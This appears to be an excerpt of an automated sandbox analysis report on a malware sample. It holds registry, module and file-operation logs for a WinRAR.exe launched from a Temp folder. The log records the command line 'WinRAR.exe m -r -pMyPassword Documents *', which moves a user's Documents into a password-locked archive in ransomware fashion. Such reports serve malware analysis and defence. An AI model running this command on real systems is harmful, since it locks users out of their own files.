Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtDataWide, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextWide, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextData, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolumeSize, data = 0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolSizeMod, data = 2, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolPause, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OldVolNames, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecVolNumber, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Update, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Fresh, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SyncFiles, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Overwrite, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Move, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcRecBin, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcWipe, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WipeIfPassword, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Solid, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Test, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecEnabled, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecSize, data = 4294967293, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Recovery, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EraseDest, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = AddArcOnly, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ClearArc, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Lock, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Method, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSizeLZ, data = 4194304, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSize, data = 33554432, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PasswordData, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EncryptHeaders, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ZipLegacyEncrypt, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OpenShared, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ProcessOwners, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveStreams, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
For performance reasons, the remaining 896 entries are omitted.
The remaining entries can be found in glog.xml.
Process #8: winrar.exe
2822 0
»
Information Value
ID #8
File Name c:\users\whuoxysd\appdata\local\temp\winrar.exe
Command Line C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Documents *
Initial Working Directory C:\Users\WhuOXYsD\Documents\
Monitor Start Time: 00:00:46, Reason: Child Process
Unmonitor End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration 00:04:37
OS Process Information
»
Information Value
PID 0xa20
Parent PID 0x8dc (c:\windows\syswow64\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A30
0x A68
0x 6E0
0x A88
0x AA8
0x 918
0x 6A4
0x 8EC
0x 174
0x 8C0
0x 240
0x 8C4
0x 2A8
0x 7A4
0x 78C
0x 780
0x 764
0x 93C
0x B60
0x B50
0x B54
0x B58
0x B5C
0x B64
0x B68
0x 80C
0x 3C4
0x 7F4
0x B4C
0x 360
0x 8F0
0x 8FC
0x 914
0x 904
0x 8D8
0x 94C
0x C4
0x 8BC
0x 8E0
0x 944
0x 11C
0x 880
0x 15C
0x 3D0
0x 5A4
0x 540
0x 534
0x 9DC
0x 9EC
0x 9F0
0x B0
0x 7BC
0x 210
0x 864
0x 870
0x 844
0x B84
0x B7C
0x 9B0
0x B8C
0x 9AC
0x B28
0x 5E0
0x 1C4
0x 688
0x 238
0x B94
0x 4AC
0x 9B8
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat 0.01 KB MD5: 732cf0fc10856b7caadb3f8522ef6947
SHA1: a1debb2f8cbcd9420ff06d9127b72dd3df24daa8
SHA256: f8cfc5341886e9e8b6f76e276172fd81c26b5869397ccf14787fd8d6f1d4c5fa
SSDeep: 3:8i:h 		False
...
Documents.rar 0.02 KB MD5: d28c293e10139d5d8f6e4592aeaffc1b
SHA1: 3b575420ceea4203152041be00dc80519d1532b5
SHA256: 61126de1b795b976f3ac878f48e88fa77a87d7308ba57c7642b9e1068403a496
SSDeep: 3:: 		False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat 0.01 KB MD5: 732cf0fc10856b7caadb3f8522ef6947
SHA1: a1debb2f8cbcd9420ff06d9127b72dd3df24daa8
SHA256: f8cfc5341886e9e8b6f76e276172fd81c26b5869397ccf14787fd8d6f1d4c5fa
SSDeep: 3:8i:h 		False
...
Threads
Thread 0xa30
2822 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 12512136863 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x77b03520 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x77b2b710 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77c384f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x77b2b230 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x77c200b0 True 1
Fn
System Get Time type = Performance Ctr, time = 12519857643 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDllDirectoryW, address_out = 0x77b2d8c0 True 1
Fn
File Add Search Path - True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, base_address = 0x13f160000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
Module Get Filename process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
File Create Directory C:\Users\WhuOXYsD\AppData\Roaming\WinRAR True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, base_address = 0x0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\riched20.dll, base_address = 0x7fef7980000 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:16 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = VerInfo, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, type = file_type True 1
Fn
File Read filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, size = 4096, size_out = 0 True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, type = file_type True 1
Fn
File Write filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, size = 12 True 1
Fn
Data
Mutex Create mutex_name = WinRAR_Busy True 1
Fn
Window Find class_name = WinRarWindow False 1
Fn
Window Create window_name = WinRAR, class_name = WinRarWindow, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
System Get Time type = Local Time, time = 2019-04-02 16:04:16 (Local Time) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarkey, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = Priority, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarreg.key, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Extraction False 1
Fn
Keyboard Get Info type = KB_CODEPAGE, result_out = 437 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\5 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcName, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileNames False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = UseRAR, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RAR5, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXModule, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFX, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXIcon, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXLogo, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXElevate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtFile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtDataWide, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextWide, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextData, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolumeSize, data = 0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
